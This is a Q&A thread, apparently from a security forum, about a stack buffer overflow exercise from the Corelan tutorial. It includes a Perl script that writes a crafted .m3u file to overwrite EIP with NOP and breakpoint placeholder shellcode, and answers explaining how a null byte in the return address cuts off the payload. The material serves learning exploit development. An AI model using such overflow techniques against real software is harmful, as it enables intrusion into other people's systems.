Why is ESP filled with null bytes after following EIP address?

Question

I'm following Corelan's tutorial on buffer overflows (https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) and have written the following code :

my $file= "crash.m3u";  
my $junk= "\x41" x 26063;  
my $eip = pack('V', 0x000ff710);  
my $shellcode = "\x90" x 25;  

$shellcode = $shellcode."\xcc";  
$shellcode = $shellcode."\x90" x 25;  

open($FILE, ">$file");  
print $FILE $junk.$eip.$shellcode;  

close($FILE);  

The code basically overflows a buffer so that the EIP is overwritten with the address 0x000ff710. I'm expecting the stack to include the written shell-code \x90, as well as the \xcc.

I open the code in Immunity Debugger and see that EIP and ESP both point to 0x000ff710. Since the next part of my script is the shellcode, I naturally expect to see the shell code there on the stack. Instead, I see a bunch of null bytes, namely the sequence 00 00 00 01 00 00 ...etc, and then eventually followed by a whole bunch of A's. Corelan explains this as "000ff730 [0x000f710 in my case] contains a null byte, which is a string terminator… so the A’s you are seeing are coming from the first part of the buffer… We never reached the point where we started writing our data after overwrite EIP…".

Can someone explain where the null bytes comes from? Furthermore, where did the shellcode in my code, the NOPs and the break, go to?

Answer 1

0x000ff710 contains null byte.

The program will get data until find 0x00.

0x90 and 0xcc which follow 0x00 will never be read by the program.

So you will never find shellcode such as 90 90 90 90 90 90 90 90... in your code.

Answer 2

Can someone explain where the null bytes comes from?

0x000ff710 is responsible for them (well, it). Indeed, 0x000ff710 is mapped into memory as is with the pack function that makes sure you are writing an address, which is an unsigned long of 32bits = 4 bytes = 0x00, 0x0f, 0xf7, 0x10

As you can see, the first byte (0x00) is NULL.

Furthermore, where did the shellcode in my code, the NOPs and the break, go to?

Your code is basically a perl script that's gonna generate a .m3u file named crash.m3u. You craft it by adding 26063 junky 'A' (0x41) to the beginning of the file (right after to open), to which you concatenate with the . operator (usually the one used for concatenation in many languages) an adress, here it's 0x000ff710. Then lastly, you concatenate to this your shellcode (a bunch of NOPs with a int 3 or int 0xcc which sets up a breakpoint for your debugger).

Your code is "printed" to the file crash.m3u. If you aren't familiar with the concept of writing to a file I suggest you open a shell and type those commands:

echo "that's some text"

echo "that's some text in a file" > myfile

The former will output the message the standard output while the latter will output it to a file.

print $FILE $junk.$eip.$shellcode; "prints" your shellcode to the file $FILE.